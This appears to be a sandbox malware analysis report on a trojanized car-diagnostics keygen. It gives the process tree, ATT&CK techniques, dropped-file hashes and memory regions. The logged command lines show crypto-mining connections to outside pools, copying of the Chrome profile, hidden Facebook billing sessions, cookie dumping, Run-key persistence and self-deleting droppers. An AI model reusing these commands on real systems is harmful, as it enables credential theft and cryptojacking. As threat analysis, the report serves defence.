                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1416
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:4900
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:5524
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.zip\Delphi_Cars_2014_r2_2_14_2_keygen_by_KeygenNinja.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:5620
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:5804
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5856
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5084
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2296
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5876
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                keygen-step-2.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Modifies system certificate store
                                                                                                                                                PID:5900
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6746.tmp.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6746.tmp.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4116
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\6746.tmp.exe"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:5140
                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                        6⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:5204
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2704
                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                        5⤵
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:4840
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                    keygen-step-3.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5924
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:4808
                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                          ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                          5⤵
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:4708
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                      keygen-step-4.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5944
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\qiangli-game.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\qiangli-game.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5016
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                          5⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:4908
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:2200
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6FF1.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6FF1.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:5140
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6FF1.tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6FF1.tmp.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:4832
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7292.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7292.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:4032
                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w17463 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                            6⤵
                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5288
                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w13253@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                            6⤵
                                                                                                                                                              PID:4232
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5572
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                6⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:3976
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5564
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                              5⤵
                                                                                                                                                                PID:508
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2876
                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                5⤵
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                PID:5852
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                5⤵
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                PID:5844
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff898c54f50,0x7ff898c54f60,0x7ff898c54f70
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5832
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2028 /prefetch:8
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4844
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2004 /prefetch:8
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:4340
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1264
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:5000
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:1
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4716
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4880
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5936
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4972
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1908,4744640916335663763,9598140503201692298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4804
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                PID:5904
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4140
                                                                                                                                                                                • C:\ProgramData\5084685.exe
                                                                                                                                                                                  "C:\ProgramData\5084685.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:648
                                                                                                                                                                                • C:\ProgramData\258711.exe
                                                                                                                                                                                  "C:\ProgramData\258711.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  PID:204
                                                                                                                                                                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                    "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1608
                                                                                                                                                                                • C:\ProgramData\7625487.exe
                                                                                                                                                                                  "C:\ProgramData\7625487.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:2712
                                                                                                                                                                                  • C:\ProgramData\7625487.exe
                                                                                                                                                                                    "{path}"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4232
                                                                                                                                                                                  • C:\ProgramData\7625487.exe
                                                                                                                                                                                    "{path}"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4272
                                                                                                                                                                                  • C:\ProgramData\7625487.exe
                                                                                                                                                                                    "{path}"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:5536
                                                                                                                                                                                • C:\ProgramData\8537361.exe
                                                                                                                                                                                  "C:\ProgramData\8537361.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4372
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                PID:4368
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5884
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:5200
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4056
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:3396

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                        Persistence

                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                        1
                                                                                                                                                                        T1060

                                                                                                                                                                        Defense Evasion

                                                                                                                                                                        Modify Registry

                                                                                                                                                                        2
                                                                                                                                                                        T1112

                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                        1
                                                                                                                                                                        T1130

                                                                                                                                                                        Credential Access

                                                                                                                                                                        Credentials in Files

                                                                                                                                                                        3
                                                                                                                                                                        T1081

                                                                                                                                                                        Discovery

                                                                                                                                                                        Query Registry

                                                                                                                                                                        3
                                                                                                                                                                        T1012

                                                                                                                                                                        System Information Discovery

                                                                                                                                                                        4
                                                                                                                                                                        T1082

                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                        1
                                                                                                                                                                        T1018

                                                                                                                                                                        Collection

                                                                                                                                                                        Data from Local System

                                                                                                                                                                        3
                                                                                                                                                                        T1005

                                                                                                                                                                        Command and Control

                                                                                                                                                                        Web Service

                                                                                                                                                                        1
                                                                                                                                                                        T1102

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                          MD5

                                                                                                                                                                          bb74183d34f6d73a16745dfbae976f38

                                                                                                                                                                          SHA1

                                                                                                                                                                          f6731af5e7e6860f5c5a05382e780ada04ddce88

                                                                                                                                                                          SHA256

                                                                                                                                                                          889991a1a16ad79ba895e12306b8e2a6346ab879f574b52ad53302cf9a335f2c

                                                                                                                                                                          SHA512

                                                                                                                                                                          d4cfbc9aa5994fee1c15a56555b5b2070cabe0cdb04c65d21a92742ce9251b82f9aec5b33bc6139574f8bb270ef07144672c433bc9560df513d18c36ee54bc43

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                          MD5

                                                                                                                                                                          65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                          SHA1

                                                                                                                                                                          a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                          SHA256

                                                                                                                                                                          862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                          SHA512

                                                                                                                                                                          e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                          MD5

                                                                                                                                                                          65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                          SHA1

                                                                                                                                                                          a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                          SHA256

                                                                                                                                                                          862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                          SHA512

                                                                                                                                                                          e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                          MD5

                                                                                                                                                                          c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                          SHA1

                                                                                                                                                                          6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                          SHA256

                                                                                                                                                                          95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                          SHA512

                                                                                                                                                                          d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                          MD5

                                                                                                                                                                          a12e7acce9c54e8f477830c938cd5bb7

                                                                                                                                                                          SHA1

                                                                                                                                                                          482ac6ae9ea9ab1673e1444269bba2ef7a86794c

                                                                                                                                                                          SHA256

                                                                                                                                                                          b5433a43058d8b81958e13064f7d5485b787d6812513600c27b913dc5c3b3bd0

                                                                                                                                                                          SHA512

                                                                                                                                                                          5198b9b7f7ab17a0173a5eed18f3b1906ab3fc64da62cfb765ff43539acdcf3a0eafeefe6184f51f1fbebaacdb0bdf422572b4b3ba70de0b116c779f5e1b7174

                                                                                                                                                                        • \??\pipe\crashpad_5056_VATXJYFTXDGNCTOV
                                                                                                                                                                          MD5

                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                          SHA1

                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                          SHA256

                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                          SHA512

                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                        • \??\pipe\crashpad_696_ZVPSIATCULWVIHUI
                                                                                                                                                                          MD5

                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                          SHA1

                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                          SHA256

                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                          SHA512

                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                        • memory/204-291-0x0000000004F10000-0x0000000004F11000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/340-301-0x0000016A35ED0000-0x0000016A35F37000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/340-259-0x0000016A35890000-0x0000016A358F7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/496-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/572-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/576-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/648-290-0x0000000004980000-0x0000000004981000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/668-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/668-125-0x00007FF8A11F0000-0x00007FF8A11F1000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                        • memory/912-309-0x00000188F5710000-0x00000188F5777000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/912-267-0x00000188F5160000-0x00000188F51C7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1008-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1056-265-0x00000229D4670000-0x00000229D46D7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1056-307-0x00000229D5340000-0x00000229D53A7000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1188-275-0x000001D1D6800000-0x000001D1D6867000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1244-273-0x000001FD461D0000-0x000001FD46237000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1408-311-0x00000213116B0000-0x0000021311717000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1408-269-0x0000021311020000-0x0000021311087000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          412KB

                                                                                                                                                                        • memory/1416-253-0x000002708F870000-0x000002708F8D7000-memory.dmp
